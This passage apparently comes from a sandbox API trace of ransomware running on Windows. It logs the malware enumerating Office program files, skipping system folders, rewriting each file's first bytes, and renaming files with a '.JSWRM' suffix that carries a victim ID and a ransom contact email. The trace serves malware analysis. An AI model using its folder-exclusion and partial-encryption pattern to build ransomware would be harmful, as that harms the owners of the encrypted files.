CloseHandle (hObject=0x238) returned 1 [0114.072] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210028 [0114.072] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0114.072] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0114.072] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0114.072] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0114.072] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0114.072] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0114.072] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a498 [0114.072] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a498, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0114.072] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a498 | out: hHeap=0x1e0000) returned 1 [0114.072] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0114.072] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0114.072] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0114.073] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x21c578 [0114.073] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0114.073] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0114.073] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\GRAPH_COL.HXT" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\graph_col.hxt"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\GRAPH_COL.HXT.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\graph_col.hxt.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0114.074] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0114.074] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210028 | out: hHeap=0x1e0000) returned 1 [0114.074] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0114.074] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x9a05f3c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x9a05f3c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x9a05f3c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x72, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="GRAPH_F_COL.HXK", cAlternateFileName="GRAPH_~1.HXK")) returned 1 [0114.074] lstrcmpiW (lpString1="GRAPH_F_COL.HXK", lpString2=".") returned 1 [0114.074] lstrcmpiW (lpString1="GRAPH_F_COL.HXK", lpString2="..") returned 1 [0114.074] lstrcmpiW (lpString1="GRAPH_F_COL.HXK", lpString2="...") returned 1 [0114.074] lstrcmpiW (lpString1="GRAPH_F_COL.HXK", lpString2="windows") returned -1 [0114.074] lstrcmpiW (lpString1="GRAPH_F_COL.HXK", lpString2="recovery") returned -1 [0114.074] lstrcmpiW (lpString1="GRAPH_F_COL.HXK", lpString2="perflogs") returned -1 [0114.074] lstrcmpiW (lpString1="GRAPH_F_COL.HXK", lpString2="documents and settings") returned 1 [0114.074] lstrcmpiW (lpString1="GRAPH_F_COL.HXK", lpString2="$RECYCLE.BIN") returned 1 [0114.075] lstrcmpiW (lpString1="GRAPH_F_COL.HXK", lpString2="system volume information") returned -1 [0114.075] lstrcmpiW (lpString1="GRAPH_F_COL.HXK", lpString2="msocache") returned -1 [0114.075] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0114.075] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GRAPH_F_COL.HXK", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0114.075] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GRAPH_F_COL.HXK", cchWideChar=15, lpMultiByteStr=0x345ebd8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GRAPH_F_COL.HXK", lpUsedDefaultChar=0x0) returned 15 [0114.075] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0114.075] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0114.075] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GRAPH_F_COL.HXK", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0114.075] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GRAPH_F_COL.HXK", cchWideChar=15, lpMultiByteStr=0x345eba8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GRAPH_F_COL.HXK", lpUsedDefaultChar=0x0) returned 15 [0114.075] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0114.075] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0114.075] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0114.075] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0114.075] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0114.075] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0114.075] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\GRAPH_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\graph_f_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0114.076] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=114) returned 1 [0114.076] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0114.076] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209530 [0114.076] ReadFile (in: hFile=0x238, lpBuffer=0x209530, nNumberOfBytesToRead=0x70, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x209530*, lpNumberOfBytesRead=0x345e89c*=0x70, lpOverlapped=0x0) returned 1 [0114.077] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0114.077] WriteFile (in: hFile=0x238, lpBuffer=0x209530*, nNumberOfBytesToWrite=0x70, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x209530*, lpNumberOfBytesWritten=0x345e898*=0x70, lpOverlapped=0x0) returned 1 [0114.077] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209530 | out: hHeap=0x1e0000) returned 1 [0114.077] CloseHandle (hObject=0x238) returned 1 [0114.077] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0114.077] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0114.077] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0114.077] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0114.077] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0114.077] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0114.077] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0114.077] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0114.077] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0114.077] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0114.077] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0114.077] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0114.077] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0114.077] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0114.078] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\GRAPH_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\graph_f_col.hxk"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\GRAPH_F_COL.HXK.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\graph_f_col.hxk.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0114.078] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0114.078] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0114.078] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0114.078] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x9a05f3c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x9a05f3c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x9a05f3c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x71, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="GRAPH_K_COL.HXK", cAlternateFileName="GRAPH_~2.HXK")) returned 1 [0114.078] lstrcmpiW (lpString1="GRAPH_K_COL.HXK", lpString2=".") returned 1 [0114.079] lstrcmpiW (lpString1="GRAPH_K_COL.HXK", lpString2="..") returned 1 [0114.079] lstrcmpiW (lpString1="GRAPH_K_COL.HXK", lpString2="...") returned 1 [0114.079] lstrcmpiW (lpString1="GRAPH_K_COL.HXK", lpString2="windows") returned -1 [0114.079] lstrcmpiW (lpString1="GRAPH_K_COL.HXK", lpString2="recovery") returned -1 [0114.079] lstrcmpiW (lpString1="GRAPH_K_COL.HXK", lpString2="perflogs") returned -1 [0114.079] lstrcmpiW (lpString1="GRAPH_K_COL.HXK", lpString2="documents and settings") returned 1 [0114.079] lstrcmpiW (lpString1="GRAPH_K_COL.HXK", lpString2="$RECYCLE.BIN") returned 1 [0114.079] lstrcmpiW (lpString1="GRAPH_K_COL.HXK", lpString2="system volume information") returned -1 [0114.079] lstrcmpiW (lpString1="GRAPH_K_COL.HXK", lpString2="msocache") returned -1 [0114.079] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0114.079] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GRAPH_K_COL.HXK", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0114.079] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GRAPH_K_COL.HXK", cchWideChar=15, lpMultiByteStr=0x345ebd8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GRAPH_K_COL.HXK", lpUsedDefaultChar=0x0) returned 15 [0114.079] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0114.079] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0114.079] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GRAPH_K_COL.HXK", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0114.079] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GRAPH_K_COL.HXK", cchWideChar=15, lpMultiByteStr=0x345eba8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GRAPH_K_COL.HXK", lpUsedDefaultChar=0x0) returned 15 [0114.079] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0114.079] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0114.079] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0114.079] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0114.079] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0114.079] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0114.079] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\GRAPH_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\graph_k_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0114.080] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=113) returned 1 [0114.080] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0114.080] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2093c8 [0114.080] ReadFile (in: hFile=0x238, lpBuffer=0x2093c8, nNumberOfBytesToRead=0x70, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2093c8*, lpNumberOfBytesRead=0x345e89c*=0x70, lpOverlapped=0x0) returned 1 [0114.081] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0114.081] WriteFile (in: hFile=0x238, lpBuffer=0x2093c8*, nNumberOfBytesToWrite=0x70, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2093c8*, lpNumberOfBytesWritten=0x345e898*=0x70, lpOverlapped=0x0) returned 1 [0114.081] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2093c8 | out: hHeap=0x1e0000) returned 1 [0114.081] CloseHandle (hObject=0x238) returned 1 [0114.081] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0114.081] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0114.081] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0114.081] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0114.081] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0114.081] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0114.081] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0114.081] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3f0 [0114.081] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3f0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0114.081] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3f0 | out: hHeap=0x1e0000) returned 1 [0114.081] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0114.081] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2476a8 [0114.081] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0114.081] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0114.081] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\GRAPH_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\graph_k_col.hxk"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\GRAPH_K_COL.HXK.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\graph_k_col.hxk.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0114.082] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0114.082] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0114.082] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0114.082] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf0194432, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf0194432, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf0194432, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x24c60, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="GRINTL32.DLL", cAlternateFileName="")) returned 1 [0114.082] lstrcmpiW (lpString1="GRINTL32.DLL", lpString2=".") returned 1 [0114.083] lstrcmpiW (lpString1="GRINTL32.DLL", lpString2="..") returned 1 [0114.083] lstrcmpiW (lpString1="GRINTL32.DLL", lpString2="...") returned 1 [0114.083] lstrcmpiW (lpString1="GRINTL32.DLL", lpString2="windows") returned -1 [0114.083] lstrcmpiW (lpString1="GRINTL32.DLL", lpString2="recovery") returned -1 [0114.083] lstrcmpiW (lpString1="GRINTL32.DLL", lpString2="perflogs") returned -1 [0114.083] lstrcmpiW (lpString1="GRINTL32.DLL", lpString2="documents and settings") returned 1 [0114.083] lstrcmpiW (lpString1="GRINTL32.DLL", lpString2="$RECYCLE.BIN") returned 1 [0114.083] lstrcmpiW (lpString1="GRINTL32.DLL", lpString2="system volume information") returned -1 [0114.083] lstrcmpiW (lpString1="GRINTL32.DLL", lpString2="msocache") returned -1 [0114.083] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0114.083] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GRINTL32.DLL", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0114.083] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GRINTL32.DLL", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GRINTL32.DLL", lpUsedDefaultChar=0x0) returned 12 [0114.083] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0114.083] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0114.083] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GRINTL32.DLL", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0114.083] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GRINTL32.DLL", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GRINTL32.DLL", lpUsedDefaultChar=0x0) returned 12 [0114.083] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0114.083] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0114.083] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0114.083] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeff0bc27, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeff0bc27, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xeff31e88, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x3a60, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="GRLEX.DLL", cAlternateFileName="")) returned 1 [0114.083] lstrcmpiW (lpString1="GRLEX.DLL", lpString2=".") returned 1 [0114.083] lstrcmpiW (lpString1="GRLEX.DLL", lpString2="..") returned 1 [0114.083] lstrcmpiW (lpString1="GRLEX.DLL", lpString2="...") returned 1 [0114.083] lstrcmpiW (lpString1="GRLEX.DLL", lpString2="windows") returned -1 [0114.083] lstrcmpiW (lpString1="GRLEX.DLL", lpString2="recovery") returned -1 [0114.083] lstrcmpiW (lpString1="GRLEX.DLL", lpString2="perflogs") returned -1 [0114.083] lstrcmpiW (lpString1="GRLEX.DLL", lpString2="documents and settings") returned 1 [0114.083] lstrcmpiW (lpString1="GRLEX.DLL", lpString2="$RECYCLE.BIN") returned 1 [0114.083] lstrcmpiW (lpString1="GRLEX.DLL", lpString2="system volume information") returned -1 [0114.083] lstrcmpiW (lpString1="GRLEX.DLL", lpString2="msocache") returned -1 [0114.083] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0114.083] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GRLEX.DLL", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0114.083] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GRLEX.DLL", cchWideChar=9, lpMultiByteStr=0x345ebd8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GRLEX.DLL", lpUsedDefaultChar=0x0) returned 9 [0114.084] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0114.084] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0114.084] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GRLEX.DLL", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0114.084] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GRLEX.DLL", cchWideChar=9, lpMultiByteStr=0x345eba8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GRLEX.DLL", lpUsedDefaultChar=0x0) returned 9 [0114.084] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0114.084] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224cc8 [0114.084] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0114.084] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf1c40a24, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf1c40a24, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x9a2c10c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1f7cc, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="GROOVE.HXS", cAlternateFileName="")) returned 1 [0114.084] lstrcmpiW (lpString1="GROOVE.HXS", lpString2=".") returned 1 [0114.084] lstrcmpiW (lpString1="GROOVE.HXS", lpString2="..") returned 1 